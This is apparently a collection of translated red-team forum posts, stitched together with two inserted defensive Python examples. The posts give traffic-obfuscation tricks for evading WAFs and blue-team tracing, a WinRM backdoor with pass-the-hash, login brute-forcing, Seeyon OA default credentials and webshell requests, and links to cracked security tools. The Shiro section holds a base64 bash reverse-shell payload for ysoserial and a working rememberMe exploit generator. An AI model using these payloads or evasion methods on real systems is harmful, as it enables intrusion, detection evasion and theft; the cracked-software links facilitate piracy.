    Also, try to use another id for Github/Blog/WX articles, to concentrate the search results or obtainable information into the false information constructed previously. Minimize the harm of features leaking personal information through open code.

    6. Network device traffic confusion

    CS traffic confusion

    Use Malleable-C2 to obfuscate CS traffic, cooperate with domain fronting to hide the backend IP, and replace the default CS certificate.

    Packet padding bytes

    When viewing the traffic of some waf devices, it was learned that due to functional limitations, the waf will not record large packets. If you think a packet will trigger rules, you can first fill the body with some garbage characters. In this way, the real matching content cannot be seen on the hardware waf, and it can also mislead the blue team in determining whether it is business traffic. (No full-flow device.)

    Packet confusion: low-risk alarms

    In devices such as Aisa/Tianyan, if there is malicious content in your packet, you can fill in some weak-password features / plaintext password logins and other alarms to cover the high-risk alarms, which will make the device monitors relax their vigilance and increase the time cost of subsequent tracing of the attack vulnerability.

    Host confusion

    When a confusing HOST is found during the waf test, the waf can detect the pre-NAT address. If you can learn some IP addresses of the target intranet, you can use HOST obfuscation to let the waf monitors determine that the pre-NAT address is the address of an intranet device. This can also guide the other party to respond on a secure server and increase the other party's time cost.

    Xff header confusion

    Usually xff header forgery is used to bypass web login IP restrictions, but in some complex intranet cases, security devices will also use xff headers to judge the attacker's outermost IP and then block it. This can be replaced during the attack process, or xff headers can be added to confuse the other party's monitoring personnel. Or add xff before the cdn, and then let the cdn continuously superimpose xff. After viewing the addition of xff in the waf, I successfully had the attack ip identified as 127.0.0.1.

    Traffic card

    In order to prevent traceability in some red team projects, it is best to use traffic cards for penetration as much as possible. Some traffic cards will jump between cities, which is very good. Including the cards I am using now, the IP judgment is basically China, and even the province will not come out, not to mention the blue team positioning based on commonly used IP locations.

    Cobalt strike DNS features

    Usually the DNS characteristics are regular requests to the black domain name (if not enabled). In this case, it is quite difficult to determine the DNS characteristics, but if you want to check it, you can check DNS-type:1 on Tianyan. Record A: the characteristics are more obvious after enabling DNS-txt. DNS-Type can find records of txt type; search for dns-type:16 in Tianyan. If there are txt records with a large number of xxx.16-digits.domain format, it can be temporarily judged as a DNS horse of CS. However, after the requests of CS version 3.14 are encrypted, I haven't seen the encryption key yet; it hasn't been solved yet. The characteristic of executing commands is post.
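For the X-Forwarded-For point above (a forged header being logged as the attacker's address, or as 127.0.0.1), here is an added defender-side example, not from the post, of how a server should attribute a request: trust the header only when the TCP peer is one of your own proxies, then walk it from the right and skip only your own proxy addresses, so whatever the client wrote into the header never becomes the attributed address. The trusted ranges, the request samples and the function names are constructed for illustration.

```python
# Added example (not from the post): attributing a request to a client
# address without letting a client-supplied X-Forwarded-For header choose
# the answer. Only hops appended by our own proxy/CDN tier are skipped;
# the first address from the right that is not ours is the client.
# The trusted ranges and sample requests are constructed for illustration.
import ipaddress
from typing import Dict, Iterable, List, Optional, Union

Network = Union[ipaddress.IPv4Network, ipaddress.IPv6Network]


def parse_networks(cidrs: Iterable[str]) -> List[Network]:
    """Parse the CIDR ranges of the proxies/CDN edges we operate or contract."""
    return [ipaddress.ip_network(c, strict=False) for c in cidrs]


def is_trusted_proxy(addr: str, trusted: List[Network]) -> bool:
    """True if addr is a valid IP inside one of the trusted ranges."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in trusted)


def client_ip(remote_addr: str, xff: Optional[str], trusted: List[Network]) -> str:
    """Return the address the request should be attributed to.

    remote_addr: the TCP peer address, which the client cannot forge.
    xff:         the raw X-Forwarded-For header value, or None.
    """
    # A peer that is not one of our proxies could have written any header
    # it likes, so the header carries no information: attribute to the peer.
    if not is_trusted_proxy(remote_addr, trusted):
        return remote_addr
    hops = [h.strip() for h in (xff or "").split(",") if h.strip()]
    # Our proxies append the peer they saw to the right end of the header,
    # so walk right-to-left and stop at the first address that is not ours.
    for hop in reversed(hops):
        if is_trusted_proxy(hop, trusted):
            continue
        try:
            return str(ipaddress.ip_address(hop))
        except ValueError:
            # Malformed entry to the left of our proxies: it was client-supplied,
            # so fall back to the nearest address we can vouch for, the peer.
            return remote_addr
    # Header empty or entirely our own hops: attribute to the peer.
    return remote_addr


def attribution_record(remote_addr: str, xff: Optional[str],
                       trusted: List[Network]) -> Dict[str, Optional[str]]:
    """Log-ready record: keep the raw header beside the attributed address so a
    forged value (e.g. a claimed 127.0.0.1) stays visible to an investigator."""
    return {
        "client": client_ip(remote_addr, xff, trusted),
        "peer": remote_addr,
        "xff_raw": xff,
    }


if __name__ == "__main__":
    # Constructed trust list: an internal load balancer range and a CDN edge range.
    trusted = parse_networks(["10.0.0.0/8", "203.0.113.0/24"])
    # Constructed request: the client sent "X-Forwarded-For: 127.0.0.1", the CDN
    # edge appended the client's real address, and the internal LB delivered it.
    print(attribution_record("10.0.0.5", "127.0.0.1, 198.51.100.9", trusted))
```

The record keeps the raw header next to the attributed address on purpose: blocking and rate-limiting should key on the attributed address, while the untouched header is what lets an analyst later see that 127.0.0.1 was injected rather than observed.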
  19. Guest
    Guest posted a topic in A Test Forum
    WinRM implements port multiplexing

    This attack method requires an account and password. If you obtain the hash, you can also use evil-winrm to achieve hash login.

    Service Introduction

    The full name of WinRM is Windows Remote Management, which is part of Microsoft's server hardware management function and can manage local or remote servers. The WinRM service allows administrators to log in to the Windows operating system remotely and obtain an interactive command-line shell similar to Telnet, while the underlying communication protocol uses HTTP.

    Backdoor Application

    On Windows Server 2012, winrm is started by default and port 5985 is enabled; on the 2008 system the service needs to be enabled manually.

        winrm quickconfig -q

    After startup, the firewall will also release the port.

    Set to enable the compatibility http listener so that listeners coexist:

        winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}    //80
        winrm set winrm/config/service @{EnableCompatibilityHttpsListener="true"}   //443

    Modify the listening port to 80/443:

        winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}
        winrm set winrm/config/Listener?Address=*+Transport=HTTPS @{Port="443"}

    The local connection also requires turning on the WinRM service and then setting up a trusted host.

        winrm quickconfig -q
        winrm set winrm/config/Client @{TrustedHosts="*"}
        winrs -r:http://172.16.142.151:5985 -u:administrator -p:admin123 "whoami"

    WinRM PTH

    Implement pth using evil-winrm under mac:

        sudo gem install evil-winrm
        evil-winrm -i 172.16.142.151 -u administrator -H 8842
  20. Guest
    Guest posted a topic in A Test Forum
    Breaking through from the most basic login box. The login box is the element that appears most often in HW and is also the easiest place to find holes. Here are some commonly used test methods.

    Login blasting tips. We have two solutions for blasting systems like this: analyze the front-end encryption algorithm and write a script to encrypt the password; or fix the password to 123456 / 000000 and use common usernames as the dictionary to blast. The two methods each have their own advantages and disadvantages. I prefer the second one, which is more efficient in the game, while analyzing the encryption algorithm is better suited to red team detection projects. Use the blasted account password to log in to the background, and you can continue to look for an upload point in the background. Here the image type check restricts the uploaded file format; add the aspx file format directly. Getshell succeeded.

    Modify the return packet parameters and enter the background. Sometimes the website's login status is judged on the front end, and then we can directly modify the return package to bypass it. The front-end login logic is determined by the ret value of the return package: when the return value is 1, the login is treated as successful. Successfully entered the background.

    Plugin detection of common SQL injection and log4j vulnerabilities. Recommended SQL injection plug-in: https://github.com/smxiazi/xia_sql. The basic principle is to send multiple data packets and judge whether there is injection from the returned data length. In addition to passive scanning, we can also manually add single and double quotes and look at the return package; if there is a similar error, there may be SQL injection. Then hand it straight to sqlmap.

    Log4j plugin recommended: https://github.com/TheKingOfDuck/burpFakeIP. Fuzz the request headers through the burp plugin. Successfully detected a log4j vulnerability in the login box. But it should be noted that many dnslog platforms have been blacklisted by firewalls, so it is recommended to use ceye or build a dnslog platform yourself.

    System default password + background 1day exploit. As offensive and defensive competitions become more and more frequent, there are fewer and fewer front-end vulnerabilities that can be exploited directly on the public network, and most of them have been fixed after batch scanning, but we can use the system's default password and combine it with a 1day. If the default password is present, admin/admin123, you can execute commands through scheduled tasks or deserialization once in the background. Many times when we encounter OA systems, we scan them with OA vulnerability detection tools, find no holes and give up. In fact, this kind of OA system may have a default password problem.

    Default passwords:
        System administrator: system/system
        Group administrator (A8-V5 group edition): group-admin/123456
        Unit administrator (A8-V5 enterprise edition): admin1/admin123456
        Audit administrator (all versions): audit-admin/seeyon123456

    Sometimes you cannot log in with the account password at the front desk. You can send the following data packet to get the cookie:

        POST /seeyon/rest/authentication/ucpcLogin HTTP/1.1
        Host:
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
        Content-Length: 71
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip

        UserAgentFrom=xx&login_username=audit-admin&login_password=seeyon123456

    After obtaining the cookie, you can use a newer background hole from the patch for deeper use. This time, use the copyfile background hole. However, in actual combat I found that there were some pitfalls in this hole, and an error was reported when writing the webshell:

        POST /seeyon/ajax.do?method=ajaxAction&managerName=portalCssManager&rnd=111 HTTP/1.1
        Accept: */*
        Content-Type: application/x-www-form-urlencoded;charset=UTF-8
        Content-Length: 70
        Host: 192.168.91.17
        Connection: Keep-Alive
        User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321)
        Accept-Encoding: gzip,deflate

        arguments=%5B%22
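The two blasting styles the post prefers (one account hammered with a dictionary, or one fixed password tried against many usernames) leave very different traces in an authentication log, and a detector has to look for both. The following is an added example, not code from the post: a sliding-window detector over constructed auth log lines that flags per-source failure bursts, password spraying across many accounts, and a success that follows an alert. The log format and thresholds are assumptions chosen for the example.

```python
"""Login-abuse detection over auth log lines (added example, not from the post).

Log format is constructed for this example:
    <ISO8601 UTC time> src=<ip> user=<name> result=<FAIL|OK>
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log: one source hammering 'admin', one source trying one
# password against many accounts (spray), and one ordinary user who mistyped once.
LOG_LINES = [
    "2024-05-01T10:00:01Z src=203.0.113.5 user=admin result=FAIL",
    "2024-05-01T10:00:02Z src=203.0.113.5 user=admin result=FAIL",
    "2024-05-01T10:00:03Z src=203.0.113.5 user=admin result=FAIL",
    "2024-05-01T10:00:04Z src=203.0.113.5 user=admin result=FAIL",
    "2024-05-01T10:00:05Z src=203.0.113.5 user=admin result=FAIL",
    "2024-05-01T10:00:06Z src=203.0.113.5 user=admin result=OK",
    "2024-05-01T10:01:00Z src=198.51.100.7 user=zhangsan result=FAIL",
    "2024-05-01T10:01:01Z src=198.51.100.7 user=lisi result=FAIL",
    "2024-05-01T10:01:02Z src=198.51.100.7 user=wangwu result=FAIL",
    "2024-05-01T10:01:03Z src=198.51.100.7 user=zhaoliu result=FAIL",
    "2024-05-01T10:05:00Z src=192.0.2.9 user=alice result=FAIL",
    "2024-05-01T10:09:00Z src=192.0.2.9 user=alice result=OK",
]

LINE_RE = re.compile(r"^(\S+) src=(\S+) user=(\S+) result=(\S+)$")


def parse_line(line):
    """Return (timestamp, src, user, result) or None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
    return ts, m.group(2), m.group(3), m.group(4)


def detect_login_abuse(lines, window=timedelta(seconds=60), fail_threshold=5, spray_users=3):
    """Return {src: set of alert kinds}.

    'bruteforce'          : >= fail_threshold failures from one source inside the window
    'spray'               : failures against >= spray_users distinct accounts inside the window
    'success_after_alert' : a successful login from a source that already triggered an alert
    """
    recent = defaultdict(deque)   # src -> deque of (timestamp, user) for failures in the window
    alerts = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, src, user, result = parsed
        q = recent[src]
        while q and ts - q[0][0] > window:   # drop failures that fell out of the window
            q.popleft()
        if result == "FAIL":
            q.append((ts, user))
            if len(q) >= fail_threshold:
                alerts[src].add("bruteforce")
            if len({u for _, u in q}) >= spray_users:
                alerts[src].add("spray")
        elif result == "OK" and alerts.get(src):
            alerts[src].add("success_after_alert")
    return dict(alerts)


if __name__ == "__main__":
    for src, kinds in detect_login_abuse(LOG_LINES).items():
        print(src, sorted(kinds))
```

The spray rule is the one that catches the post's favourite approach: the per-account failure count stays at one, so lockout-style counters never fire, but the number of distinct usernames failing from a single source in a short window does.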
  21. Guest
    Guest posted a topic in A Test Forum
    0x01 Tools used
    The download address and installation method of each tool are placed after its introduction. If necessary, you can download them yourself.

    1. AWVS
    AWVS introduction: Acunetix Web Vulnerability Scanner (AWVS) is a platform for testing and managing the security of web applications. It can automatically scan the Internet or a local LAN for vulnerabilities and report them. Any web site that is accessed over HTTP/HTTPS can be scanned: intranet, extranet and web sites for customers, employees, vendors and other personnel of any small, medium or large enterprise. AWVS can review the security of web applications by checking for SQL injection vulnerabilities, XSS cross-site scripting vulnerabilities, etc.
    AWVS features:
    1) Automatic client script analyzer, allowing security testing of Ajax and Web 2.0 applications
    2) The most advanced and in-depth SQL injection and cross-site scripting testing in the industry
    3) Advanced penetration testing tools such as HTTP Editor and HTTP Fuzzer
    4) Visual macro recorder helps you easily test web forms and password-protected areas
    5) Supports pages with CAPTCHA, single sign-on and two-factor authentication mechanisms
    6) Rich reporting features including VISA PCI compliance reports
    7) High-speed multithreaded scanner easily retrieves thousands of pages
    8) Intelligent crawler detects web server type and application language
    9) Acunetix retrieves and analyzes websites, including Flash content, SOAP and AJAX
    10) Port scans the web server and performs security checks on the network services running on it
    11) Can export website vulnerability files
    AWVS tool installation tutorial address: https://blog.csdn.net/shandongjiushen/article/details/128377981
    AWVS tool cracked version download address (Baidu Netdisk): https://pan.baidu.com/s/1KayUhIShgUjozphx41CqsQ Extraction code: qbe0

    2. AppScan
    AppScan introduction: AppScan is a dynamic application security testing tool designed specifically for security experts and testers. It can easily help users develop safer software and effectively avoid expensive vulnerabilities late in the development life cycle. The software has a powerful built-in scanning engine that automatically crawls the target application and tests for vulnerabilities, and the test results are presented by priority, which lets operators classify problems faster and discover the most critical vulnerabilities first. At the same time, AppScan automatically gives users clear and feasible repair suggestions, so that each discovered problem can be remediated more easily. Moreover, the software has a comprehensive security testing suite that supports testing web applications, web services and mobile back ends, and uses proprietary operation-based technology and tens of thousands of built-in scans to check continuously, so that this continuous testing and risk evaluation of web services and applications helps prevent destructive security vulnerabilities.
    AppScan functions:
    1) Active and passive scanning: AppScan supports both active and passive scanning. In active scanning mode it simulates the behaviour of an attacker, sending malicious requests and attack payloads to discover known web vulnerabilities such as cross-site scripting (XSS), SQL injection, cross-site request forgery (CSRF), etc. In passive scanning mode, AppScan listens to the application's communication and interaction, analyses data flow and responses, and looks for potential security vulnerabilities and problems.
    2) Web application and mobile application scanning: AppScan is suitable for both web application scanning and mobile application security assessment. For web applications, AppScan can automatically discover and evaluate common web vulnerabilities such as XSS, SQL injection, sensitive information leakage, etc. For mobile applications, AppScan is able to analyse the application's binary code and discover vulnerabilities and security issues in it.
    3) Penetration testing support: AppScan provides penetration testing support, which means it is not just a vulnerability scanning tool but can also simulate real attacks for testing. Penetration testing can help discover vulnerabilities that are hard to detect and has deeper testing capabilities for complex vulnerabilities and business logic problems.
    AppScan tool installation tutorial address: https://blog.csdn.net/qq_39720249/article/details/121248901
    AppScan tool cracked version download address (Baidu Netdisk): https://pan.baidu.com/s/1UnAZBFwYvEvzUQPC1eQaBA Extraction code: ime6

    3. Yakit
    Yakit introduction: YAK is the world's first vertical development language dedicated to integrating the underlying capabilities of network security, providing very powerful security capabilities. Yak is a superset of most "data description languages / container languages". It has all of Go's capabilities and library ecosystem, VSCode plug-ins, etc. The syntax is customizable. It is a Turing-complete scripting language, entirely domestic. It provides various underlying security capabilities through functions, including port scanning, fingerprint recognition, a POC framework, shell management, MITM hijacking, a powerful plug-in system, etc. Yakit is a personal cybersecurity tool developed on the Yak language, aiming to create a network security tool library covering the entire penetration testing process. Because of the way Yak is used, users must learn the Yak language and at the same time have a certain understanding of security. In order to make Yak's security capabilities easier for everyone to accept and use, we wrote a gRPC server for Yak and built a client, Yakit, which lowers the threshold for using Yak through a GUI.
    A brief introduction to Yakit functions (there are too many): Yakit is a highly integrated output platform for Yak language security capabilities. Using Yakit, we can do:
    1) MITM hijacking operation table similar to Burp Suite
    2) View the history of all hijacked requests and analyse the parameters of the requests
    3) The world's first visual web fuzzer tool: Web Fuzzer
    4) Yak Cloud IDE: a Yak language cloud IDE with built-in smart prompts
    5) ShellReceiver: open a TCP server to receive reverse interactive shell connections
    6) Third-party Yak module store: community-led third-party Yak module plug-ins, with everything you want
    Yakit tool installation tutorial address: https://blog.csdn.net/m0_60045654/article/details/134645164
    Yakit tool download address: https://yaklang.com/

    4. Burp Suite
    Burp Suite introduction: Burp Suite is an integrated platform for attacking web applications and contains many tools. Burp Suite designs many interfaces for these tools to speed up the process of attacking applications. All tools share one request and can handle the corresponding HTTP messages, persistence, authentication, proxy, logs and alerts.
    Burp Suite tool functions:
    1) Target: displays the target directory structure
    2) Proxy: an intercepting HTTP/S proxy server acting as an intermediary between the browser and the target application, allowing you to intercept, view and modify the raw data flow in both directions.
    3) Spider: an intelligent web crawler that can fully enumerate the content and functions of the application.
    4) Scanner: an advanced tool that, when run, automatically discovers security vulnerabilities in web applications.
    5) Intruder: a customized, highly configurable tool that automates attacks on web applications such as enumerating identifiers, collecting useful data and using fuzzing to detect conventional vulnerabilities.
    6) Repeater: a tool that relies on manual operation to trigger individual HTTP requests and analyse application responses.
    7) Sequencer: a tool for analysing the randomness of unpredictable application session tokens and important data items.
    8) Decoder: a tool for manually or intelligently decoding and encoding application data.
    9) Comparer: usually obtains a visual "diff" of two pieces of data from related requests and responses.
    10) Extender: lets you load Burp Suite extensions and use your own or third-party code to extend Burp Suite's functions.
    11) Options: some settings for Burp Suite
    Burp Suite tool installation tutorial address: https://blog.csdn.net/m0_60045654/article/details/134645164
    Burp Suite tool jar crack package: https://link.zhihu.com/?target=https%3A//github.com/lzskyline/BurpLoaderKeygen/raw/main/BurpLoaderKeygen.jar
    Burp Suite tool download address: https://link.zhihu.com/?target=https%3A//portswigger.net/burp/releases/

    5. Xray
    Xray introduction: Xray is a powerful security assessment tool launched by Chaitin Tech. It was created by many experienced front-line security practitioners. It supports active and passive scanning, supports multiple operating systems such as Windows, Linux and macOS, and supports user-defined POCs. It can quickly detect vulnerabilities in target websites. Compared with traditional manual vulnerability scanning, Xray has the following advantages:
    1. High degree of automation, reducing the time and energy of manual operation;
    2. Supports scanning for multiple vulnerability types;
    3. Supports distributed deployment;
    4. Supports web interface management.
    Xray functions: The POC framework has built-in POCs contributed on GitHub by default, and users can also build and run their own as needed. Currently supported vulnerability detection types include:
    1) XSS vulnerability detection (key: xss)
    2) SQL injection detection (key: sqldet)
    3) Command/code injection detection (key: cmd-injection)
    4) Directory enumeration (key: dirscan)
    5) Path traversal detection (key: path-traversal)
    6) XML entity injection detection (key: xxe)
    7) File upload detection (key: upload)
    8) Weak password detection (key: brute-force)
    9) JSONP detection (key: jsonp)
    10) SSRF detection (key: ssrf)
    11) Baseline check (key: baseline)
    12) Arbitrary redirect detection (key: redirect)
    13) CRLF injection (key: crlf-injection)
    14) Struts2 series vulnerability detection (advanced edition, key: struts)
    15) ThinkPHP series vulnerability detection (advanced edition, key: thinkphp)
    16) XStream series vulnerability detection (key: xstream)
    17) POC framework (key: phantasm)
    Xray tool installation tutorial address: https://blog.csdn.net/weixin_52244272/article/details/132278409
    Xray11 tool cracked version download address: https://pan.baidu.com/s/1n5lqeSVXpk_CgBS7JMFkdA?pwd=amlj Extraction code: amlj

    0x02 Tool linkage
    Start linking the five tools to automatically scan the target website for vulnerabilities.

    1. AppScan linkage preparation
    Open the AppScan interface and select New - Scan web service - Next. Select "Let AppScan automatically select ports" (the ports and addresses selected here are the address and port the AWVS agent listens on) - Local - "I need to configure other connection settings" - Next. Select "Use custom proxy settings" - Address: 127.0.0.1 - Port: 8083 (the proxy address and port set here are Yakit's proxy listening address) - Next. No need to set anything, just go to the next step. Without setting anything, go to the next step and click Finish. You get an external traffic recorder; wait for the traffic to pass through here to be displayed.

    2. Yakit linkage preparation
    Start Yakit, open a temporary project and select Penetration testing tools - MITM interactive hijacking. Let me mention here that Yakit has only 15 scanning plug-ins downloaded by default. If you want more comprehensive passive vulnerability scanning, you can go to the plug-in store to download the plug-ins you need. You can download all the plug-ins with one click, but scanning will then be very slow; just download the ones you need. Go back to MITM interactive hijacking, set the hijacking proxy listening host to 127.0.0.1, the hijacking proxy listening port to 8083, and the downstream proxy to http://127.0.0.1:8080 (the downstream address set here is the proxy listening address and port of Burp Suite). Select Enable plug-ins, set the plug-ins on the left to Select All, and choose configuration-free startup after setting (it is best to choose configuration-free startup, otherwise the traffic cannot pass when linking Burp Suite). The vulnerabilities scanned later will be displayed here.

    3. Burp Suite linkage preparation
    Open Burp Suite and select Temporary Project - Next. Use Burp Suite's defaults - Next. Select Settings and set up the proxy: bind port 8080, bind address loopback only (the proxy listening address and port set here are the downstream proxy address set in Yakit). Set up Burp Suite's upstream proxy: destination host * (all target hosts are allowed), proxy host 127.0.0.1, proxy port 7777 (the Xray listening address and port are set here). Add a live task, set it to passively scan all traffic passing through the proxy, edit the built-in scanning behaviour, set the scan type, select all, turn on full firepower, click Save. Click OK and set the passive scan.

    4. Xray linkage preparation
    Use Xray to listen on 127.0.0.1:7777 (the port listened on here is the upstream proxy set in Burp Suite), passively scan for vulnerabilities, and output vulnerabilities to 123.html.

    0x04 Start the linked scan
    All preparations are in place; use AWVS as the starting point for the first access to the scan target traffic.
    1. Intercept traffic: first hijack the traffic in Yakit and Burp Suite to make it easy to watch the traffic flow later.
    2. Set the AWVS scan target: set the AWVS scan target to access traffic. Add a scan target (this target is authorized) and click Save.
  22. Guest
    Guest posted a topic in A Test Forum
    Shiro
    Apache Shiro provides authentication, authorization, cryptography and session management functions, hiding the complex problems and providing clear, intuitive APIs that let developers easily write the security code for their own programs. Shiro focuses on what its development team calls the "four security cornerstones": authentication, authorization, session management and cryptography.
    Authentication: user identity identification. Sometimes regarded as "login", it is the act by which a user proves who he is.
    Authorization: the access control process, i.e. determining who can access what.
    Session management: manages user sessions even in an environment without web or EJB containers; manages the user's time-related state.
    Cryptography: uses encryption algorithms to protect data more securely and prevent it from being peeked at.
    @shiro: https://github.com/vulhub/vulhub/tree/master/shiro

    CVE-2010-3863: Apache Shiro authentication bypass vulnerability
    Vulnerability principle: In versions before Apache Shiro 1.1.0, Shiro did not normalize the URL before performing permission verification. Attackers can construct /, //, /./, /../, etc. to bypass permission verification.
    Affected versions: Shiro < 1.1.0 and JSecurity 0.9.x
    Vulnerability recurrence: The access page address is IP:8080; the vulnerability point is /admin. Fuzz it with a cross-directory test dictionary.

    CVE-2016-4437: Apache Shiro 1.2.4 deserialization vulnerability / Shiro550
    Vulnerability principle: This is the Shiro550 vulnerability. In Apache Shiro 1.2.4 and earlier, encrypted user information is serialized and stored in a cookie named rememberMe. Attackers can use Shiro's default key to forge a user cookie, trigger Java deserialization and then execute arbitrary commands on the target machine. Shiro uses CookieRememberMeManager by default: in the CookieRememberMeManager class the rememberMe field contents are serialized, AES-encrypted and Base64-encoded. When identifying an identity, the rememberMe field in the cookie has to be decrypted; from the encryption order it follows that the decryption order is: obtain cookie -> Base64 decode -> AES decrypt -> deserialize.
    Affected versions: Apache Shiro <= 1.2.4
    Vulnerability recurrence: Determine whether a page's login uses the Shiro framework for authentication, authorization, cryptography and session management. How to judge: after checking the Remember Password option, click Login, capture the packet, and observe whether there is a rememberMe field in the request and whether there is a Set-Cookie: rememberMe=deleteMe field in the response, similar to the picture below. As long as the rememberMe=deleteMe field appears in the response, it is said that there is a vulnerability. To be more careful: the rememberMe=deleteMe field should only indicate that the login page uses Shiro for authentication, not directly that there is a vulnerability.
    - If the request's cookie has no rememberMe field, the response Set-Cookie has no deleteMe field.
    - If the login fails, whether or not RememberMe is checked, the response has the rememberMe=deleteMe field.
    - If the login succeeds without RememberMe checked, the response Set-Cookie has rememberMe=deleteMe, but the cookies of all subsequent requests have no rememberMe field.
    - If the login succeeds with RememberMe checked, the response Set-Cookie has rememberMe=deleteMe and a rememberMe field, and the cookies of all subsequent requests carry a rememberMe field.
    - Or you can append rememberMe=1 to the cookie and see whether rememberMe=deleteMe comes back.

        YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjEyOS80NDQ0IDA+JjE=
        java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjEyOS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}'

    Use shiro-exploit.py to get Shiro's default key (tool address: https://github.com/insightglacier/Shiro_exploit). Use shiro.py to generate the payload (you need to change the key yourself; the shiro.py code is as follows). Command: shiro.py 192.168.17.132:6666
    shiro.py:

        import sys
        import uuid
        import base64
        import subprocess
        from Crypto.Cipher import AES

        def encode_rememberme(command):
            popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
            BS = AES.block_size
            pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
            key = base64.b64decode('kPH+bIxk5D2deZiIxcaaaA==')
            iv = uuid.uuid4().bytes
            encryptor = AES.new(key, AES.MODE_CBC, iv)
            file_body = pad(popen.stdout.read())
            base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
            return base64_ciphertext

        if __name__ == '__main__':
            payload = encode_rememberme(sys.argv[1])
            print('rememberMe={0}'.format(payload.decode()))

        python3 shiro.py 192.168.200.129:6666

    After logging in, capture the packet and replace the cookie value in the packet with the rememberMe generated by shiro.py.

    CVE-2020-1957: Apache Shiro authentication bypass vulnerability
    Vulnerability principle: We need to analyse how the URL we request is passed through the whole project. In a project that uses Shiro, the URL we request (URL1) is checked by Shiro's permission check (URL2), and finally the route in the Spring Boot project processes it (URL3). The vulnerability arises because URL1, URL2 and URL3 may not be the same URL, which lets us bypass Shiro's verification and access the backend directly. The vulnerability in this case is caused by this. The Shiro framework controls user access rights through interceptor functions such as the anon and authc interceptors: anon is an anonymous interceptor and does not require login to access; authc is a login interceptor and requires login to access.
    Affected versions: Apache Shiro < 1.5.2
    Vulnerability recurrence: Changing the URL to /admin automatically jumps to the login page. Construct a malicious request for permission bypass. Because at the code level an added ; is recognized, add a short /. instead: the URL becomes /xxx/./admin/, the login is bypassed and direct access succeeds!

        /xxx/./admin/

    Shiro 721 vulnerability recurrence: CVE-2019-12422
    Environment: Kali Linux. Docker build and start:

        git clone https://github.com/3ndz/Shiro-721.git
        cd Shiro-721/Docker
        docker build -t shiro-721 .
        docker run -p 8080:8080 -d shiro-721

    Access: If you log in with the correct account password, two request packets are sent, namely a POST and a GET. The POST request packet is shown in the figure below (the packet obtained by logging in with the correct account password). The GET request packet is as follows (this is the packet obtained by logging in with the correct password, mainly submitting the cookie value to the background). Seeing a rememberMe=deleteMe field in the response, it can be said that there is a Shiro deserialization vulnerability. Add the HaE and Logger++ Burp plugins to view Shiro's fingerprint. Tool utilization:

    fastjson
    @fastjson: https://github.com/vulhub/vulhub/tree/master/fastjson
    Vulnerability principle: The principle of this vulnerability lies in Fastjson's deserialization mechanism. When Fastjson parses JSON data, it tries to convert the JSON data to a Java object. In this process, Fastjson decides how to parse the data based on the type information in the JSON data. Attackers can take advantage of this by constructing specific data types and structures in the JSON, so that Fastjson calls maliciously constructed Java classes or methods during parsing, thereby achieving remote code execution. A common way of exploiting this is Fastjson's autoType function. autoType is a feature of Fastjson that allows the fully qualified class name to be used when serializing and deserializing. An attacker can construct malicious JSON data and use a malicious class as the autoType value. When Fastjson deserializes, it tries to instantiate the specified class, thereby executing the code in the class (in exploitation, JdbcRowSetImpl is generally used for the exploit chain).
    @type field: @type is one of the special fields in Fastjson used to carry object type information. In JSON data, the @type field can be used to specify the type of the class that should be instantiated during deserialization. This field is usually used to specify the type information of the object during deserialization, especially when Fastjson's autoType function is enabled. Through the @type field, Fastjson can identify the class to be instantiated and create objects based on the class path given in that field. This is very useful when serializing and deserializing complex object structures, because it lets you specify the exact type of the object. However, it is precisely because of the existence and use of the @type field that malicious users may construct malicious JSON data and specify a malicious class path in the @type field. In this way, during the deserialization process, Fastjson will try to instantiate the corresponding class based on the class path specified by the @type field, which may result in malicious code being executed or a security vulnerability being exploited.
    JNDI: JNDI, RMI and LDAP are technologies used in Java for different purposes.
    JNDI (Java Naming and Directory Interface): JNDI is a set of APIs in Java used to access different naming and directory services. JNDI provides a unified access method that allows Java applications to connect to and use a variety of different naming and directory services, such as DNS, LDAP, the RMI registry, etc. The purpose of JNDI is to provide a unified access method, allowing Java applications to take advantage of the naming and directory functions of different services.
    RMI (Remote Method Invocation): RMI is a mechanism used in Java to implement remote method calls. It allows communication and method calls between objects in different Java virtual machines. In distributed systems, RMI allows remote systems to call each other's methods to achieve interaction between remote objects.
    LDAP (Lightweight Directory Access Protocol): LDAP is a protocol used to access distributed directory services. It is usually used to store structured data such as user information, organizational structure, etc. In Java, JNDI provides support for LDAP access, allowing JNDI to connect to and operate LDAP directory services for user authentication, data retrieval, etc.
    The relationship between these technologies is that JNDI, as a Java API, provides a unified way to access different services, including LDAP. JNDI lets you connect to and operate an LDAP server and retrieve and store data in an LDAP directory. In addition, JNDI can also be used to find remote objects in the RMI registry to implement remote method calls. In summary, JNDI, as an API in Java, provides a unified way to access different services, allowing Java applications to connect to and operate different naming and directory services such as LDAP and the RMI registry.
